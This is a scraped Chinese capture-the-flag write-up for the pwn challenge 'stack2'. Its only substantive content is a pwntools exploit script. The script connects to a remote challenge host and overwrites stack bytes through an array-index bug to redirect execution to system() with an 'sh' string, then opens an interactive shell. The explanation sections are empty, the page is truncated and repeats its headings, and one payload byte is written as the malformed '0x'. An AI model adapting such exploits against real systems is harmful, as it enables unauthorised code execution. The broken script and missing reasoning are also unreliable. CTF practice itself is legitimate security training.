pwn之stack2

来源：99网

1.题目

1.保护机制

开了canary和nx

2.关键代码

2.思路

from pwn import *

context(arch="i386",os="linux",log_level="debug")
con = remote('111.200.241.244',56638)
#con = process('./pwn')
elf = ELF('./pwn')
# sys_addr + padding_addr + sh_addr
hack_array = [0x50,0x84,0x4,0x8,0x0,0x0,0x0,0x0,0x87,0x,0x4,0x8]

con.sendlineafter("you have:","1")
con.sendlineafter("numbers","1")
for i in range(0,12):
    con.sendlineafter("exit","3")
    con.sendlineafter("change:",str(132+i))
    con.sendlineafter("number:",str(hack_array[i]))

con.sendlineafter("exit","5")
con.interactive()

因篇幅问题不能全部显示，请点此查看更多更全内容

查看全文

全部频道

pwn之stack2

1.题目

1.保护机制

2.关键代码

2.思路